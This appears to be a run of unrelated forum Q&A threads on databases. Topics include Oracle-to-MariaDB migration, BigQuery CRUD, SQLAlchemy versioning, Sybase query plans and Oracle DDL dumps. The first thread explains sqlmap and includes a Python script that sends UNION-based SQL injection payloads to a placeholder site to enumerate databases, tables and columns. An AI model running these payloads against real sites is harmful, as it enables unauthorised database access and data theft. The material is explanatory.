I understand how SQLMAP checks for vulnerabilities, but now I'm fascinated by how, after finding a vulnerability, SQLMAP fetches the databases, tables, and columns. I tried to understand by looking at their GitHub repo, but still couldn't work it out.
Have a read of this Hakipedia page on SQLi, which covers how the MySQL INFORMATION_SCHEMA database is queried in order to fetch database metadata.
The MySQL INFORMATION_SCHEMA database (available from MySQL 5) is made up of table-like objects (aka system views) that expose metadata in a relational format. Executing arbitrary injections via SELECT statements thus makes it possible to retrieve and format said metadata. Metadata is only accessible to an attacker if the objects it describes are accessible to the current user account. The INFORMATION_SCHEMA database is automatically created by the server upon MySQL installation, and the metadata within is maintained by the server.
For example, a UNION clause could be injected into the SQL statement to retrieve data from the INFORMATION_SCHEMA tables, as in the sketch below.
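Here is a minimal sketch of that idea, assuming a UNION-injectable numeric parameter and an original query that returns two columns (the URL, the padding NULL, and the 'shop'/'users' names are all made up for illustration); sqlmap automates exactly this kind of metadata walk:

import requests

BASE = "http://target.example/item.php?id="

def union_query(select_list_and_from):
    # id=0 forces the original query to return no rows, so only the
    # UNIONed row shows up in the response body.
    payload = "0 UNION SELECT " + select_list_and_from
    return requests.get(BASE + payload).text

# 1. Enumerate databases.
dbs = union_query("GROUP_CONCAT(schema_name), NULL FROM INFORMATION_SCHEMA.SCHEMATA")

# 2. Enumerate tables in one database.
tables = union_query("GROUP_CONCAT(table_name), NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='shop'")

# 3. Enumerate columns in one table.
cols = union_query("GROUP_CONCAT(column_name), NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='users'")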
I'm not sure how to go about doing a one-time load of the existing data I have in Oracle into MariaDB. I have DBeaver, which I am using to access the databases. I saw an option in DBeaver to migrate the data from the source (Oracle) to the target (MariaDB) in a few clicks, but I'm not sure if that's the best approach.
Is writing a Python script a better way of doing it? Should I download another tool to do a one-time load? We are using CData Sync to do the incremental loads. Basically, it copies data from one database to another (Oracle to SQL Server, for example) and does incremental loads. I'm not sure if I can use it to do a full, one-time load of all the data I have in my Oracle database into MariaDB. I'm new to this; I've never loaded data before. The thing is, I have over 1100 tables, so I can't manually write the schema for each table and do a "CREATE TABLE" statement for all 1100 of them...
Option 1 DBeaver
If DBeaver offers to do it in a few clicks, I'd try it on some small tables first and see what it produces.
Option 2 MariaDB connect
Alternatively, there is the MariaDB CONNECT storage engine, which can reach Oracle over ODBC or JDBC.
Note you don't need to write out the full table structure for every table, but you do need the list of tables so you can generate a CREATE TABLE t1 ENGINE=CONNECT TABLE_TYPE=ODBC tabname='T1' CONNECTION='DSN=XE;.. statement for each one (see the sketch after the SQL below).
Then it would be:
create database mariadb_migration;
create table mariadb_migration.t1 like t1;
insert into mariadb_migration.t1 select * from t1;
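Since hand-writing those CONNECT definitions for 1100 tables isn't realistic, here is a rough Python sketch that generates one statement per Oracle table from the catalog; the credentials, DSN name, and output file are placeholders:

import cx_Oracle

conn = cx_Oracle.connect("scott", "tiger", "localhost/XE")
cur = conn.cursor()
cur.execute("SELECT table_name FROM user_tables")

with open("create_connect_tables.sql", "w") as f:
    for (name,) in cur:
        # One CONNECT table per Oracle table; MariaDB discovers the real
        # column structure through ODBC, so no hand-written column lists.
        f.write(
            "CREATE TABLE " + name.lower() + " ENGINE=CONNECT "
            "TABLE_TYPE=ODBC tabname='" + name + "' "
            "CONNECTION='DSN=XE;UID=scott;PWD=tiger';\n"
        )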
Option 3 MariaDB Oracle Mode
This uses the Oracle compatibility mode of MariaDB.
Take a SQL dump from Oracle.
Prepend SET SQL_MODE='ORACLE'; to the start of the dump.
Import this to MariaDB.
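A tiny sketch of the prepend step, with placeholder file names:

# Prepend the Oracle-compatibility switch before importing the dump.
with open("oracle_dump.sql") as src, open("mariadb_dump.sql", "w") as dst:
    dst.write("SET SQL_MODE='ORACLE';\n")
    dst.write(src.read())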
Option 4 SQLines
SQLines offers an Oracle to MariaDB conversion tool.
Small disclaimer: I've not done any of these personally; I just know these options exist.
I have a BigQuery table of about 200 rows, and I need to insert, delete, and update values in it through a web interface (the table cannot be migrated to any other relational or non-relational database).
The web application will be deployed on Google Cloud App Engine. The user who has admin and owner privileges on BigQuery will be able to create and delete records, and the other users, with view permissions on the dataset in BigQuery, will be able to view records only.
I am planning to use Python as the scripting language, with Django or Flask (or any other framework) as the server; I'm not sure which one is better.
The web application should be displayed as a data grid, with create, delete, and view buttons whose visibility depends on the user's role.
I have not done anything like this with Python, BigQuery, and Django. I am already familiar with calling BigQuery from the Python client, but calling it from a web interface, and in a transactional way, is totally new to me.
The examples I'm seeing relate only to Django with its built-in models, not to BigQuery.
Can anyone please clarify whether this is possible to implement, and how?
I was able to achieve all of "C R U D" on BigQuery with the help of SQLAlchemy, though I had to make a lot of concessions. If I used a SQLAlchemy class, I needed a fake primary key, since BigQuery does not use primary keys, and for storing sessions in Django I needed to use file-based sessions. For updates and creates, SQLAlchemy does not allow them without a primary key, so I used the raw SQL part of SQLAlchemy. Thanks to @mhawke, who provided the hint for me to carry out this exercise.
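A minimal sketch of that raw-SQL route, assuming the BigQuery SQLAlchemy dialect (the sqlalchemy-bigquery / pybigquery package); the project, dataset, table, and column names are made up:

from sqlalchemy import create_engine, text

engine = create_engine("bigquery://my-project")

with engine.connect() as conn:
    # BigQuery has no primary keys, so the row to update is matched on an
    # application-chosen column instead of an ORM identity.
    conn.execute(
        text("UPDATE `my-project.my_dataset.my_table` "
             "SET status = :status WHERE row_id = :row_id"),
        {"status": "done", "row_id": 42},
    )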
No, at most you could achieve the "R" of "CRUD." BigQuery isn't a transactional database; it's for querying vast amounts of data and preparing the results as an immutable view.
It doesn't provide a method to modify the source data directly, and even if you did modify it, you'd need to run the query again. Also important to note is that queries are asynchronous and take much longer to perform than in traditional databases.
The only reasonable solution would be to export the table data to GCS and then import it into a normal database for querying. Alternatively, if you can't use another database, then since you said there are only about 200 rows you could perform your CRUD actions directly on that exported CSV.
I'm currently developing a Python Flask app that will allow users to write paragraphs and store them in a MySQL database. Are there any Python libraries that will give users the benefits of version control? Ideally users would be able to track edits so that they can revert to previous versions of the text they've written.
If you're using SQLAlchemy, check out sqlalchemy-continuum (a minimal usage sketch follows the feature list below).
Features:
Does not store updates which don't change anything
Supports Alembic migrations
Can revert object data, as well as all object relations, at a given transaction, even if the object was deleted
Transactions can be queried afterwards using SQLAlchemy query syntax
Querying for changed records at a given transaction
Querying for versions of an entity that modified a given property
Querying for transactions at which entities of a given class changed
History models give access to parent object relations at any given point in time
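Here's a minimal, hedged sketch of wiring Continuum into the paragraph-writing use case above; the model, column names, and database URL are made up for illustration (swap in your MySQL URL):

import sqlalchemy as sa
from sqlalchemy.orm import declarative_base, sessionmaker
from sqlalchemy_continuum import make_versioned

make_versioned(user_cls=None)   # must run before models are defined

Base = declarative_base()

class Paragraph(Base):
    __tablename__ = "paragraph"
    __versioned__ = {}          # opt this model into versioning
    id = sa.Column(sa.Integer, primary_key=True)
    body = sa.Column(sa.UnicodeText)

sa.orm.configure_mappers()      # Continuum builds the version classes here

engine = sa.create_engine("sqlite://")  # placeholder; use MySQL in the app
Base.metadata.create_all(engine)
session = sessionmaker(bind=engine)()

p = Paragraph(body="first draft")
session.add(p)
session.commit()
p.body = "second draft"
session.commit()

# Each commit is one version; revert by copying an old body back.
print(p.versions[0].body)       # "first draft"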
Or check out the versioning objects section in the SQLAlchemy documentation.
I also found this tutorial, Database Content Versioning Using SQLAlchemy, by Googling "sqlalchemy history table"; you may find other solutions the same way.
I'm using SQLAlchemy in Python to execute my SQL queries. I have prefixed my SQL queries with set showplan on. However, I am not getting the plan back in my results. Does anyone know if the plan results are stored somewhere in some system table, or is there some flag that needs to be enabled for the SQLAlchemy DB API to capture the plan?
Just to reiterate, I'm running against a Sybase database.
It might be worth trying
set noexec on
... as well to see if a query plan comes back.
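Also worth knowing: Sybase sends showplan output back as informational server messages rather than as a result set, so many drivers simply discard it. As a rough sketch (the dialect string and DSN are assumptions, and SQLAlchemy's Sybase dialect was deprecated in 1.4), the switches have to be issued on the same underlying connection as the query:

from sqlalchemy import create_engine

# Placeholder URL; the sybase+pyodbc dialect shipped with older SQLAlchemy.
engine = create_engine("sybase+pyodbc://user:pass@my_dsn")

with engine.connect() as conn:
    cur = conn.connection.cursor()  # drop to the raw DBAPI cursor
    cur.execute("set showplan on")
    cur.execute("set noexec on")    # compile only; don't run the query
    cur.execute("select * from my_table where id = 1")
    # The plan text arrives as server messages, not rows; whether your
    # driver surfaces them (e.g. via a messages attribute) is driver-specific.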
I want to dump Oracle objects like tables and stored procedures using cx_Oracle from Python.
Is there any tutorial on how to do this?
If you are looking for the source code for tables you can use the following:
select DBMS_METADATA.GET_DDL('TABLE','<table_name>') from DUAL;
For stored procedures you can use:
select text from all_source where name = '<procedure name>' order by line
In general this is not a cx_Oracle-specific problem; just query the Oracle-specific views (like ALL_SOURCE) or functions (like GET_DDL) and read the results in like any other query. There are more of these views (like USER_SOURCE, for source that you, the current user, own) in Oracle, but I'm doing this off the top of my head and don't have easy access to an Oracle DB to remind myself.
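To make that concrete, a minimal cx_Oracle sketch of running the two queries above; the credentials, DSN, and object names ('EMP', 'MY_PROC') are placeholders:

import cx_Oracle

conn = cx_Oracle.connect("scott", "tiger", "localhost/XE")
cur = conn.cursor()

# Table DDL via DBMS_METADATA; GET_DDL returns a CLOB, so read() it.
cur.execute("SELECT DBMS_METADATA.GET_DDL('TABLE', 'EMP') FROM DUAL")
print(cur.fetchone()[0].read())

# Stored procedure source comes back one line per row.
cur.execute(
    "SELECT text FROM all_source WHERE name = :name ORDER BY line",
    name="MY_PROC")
print("".join(row[0] for row in cur))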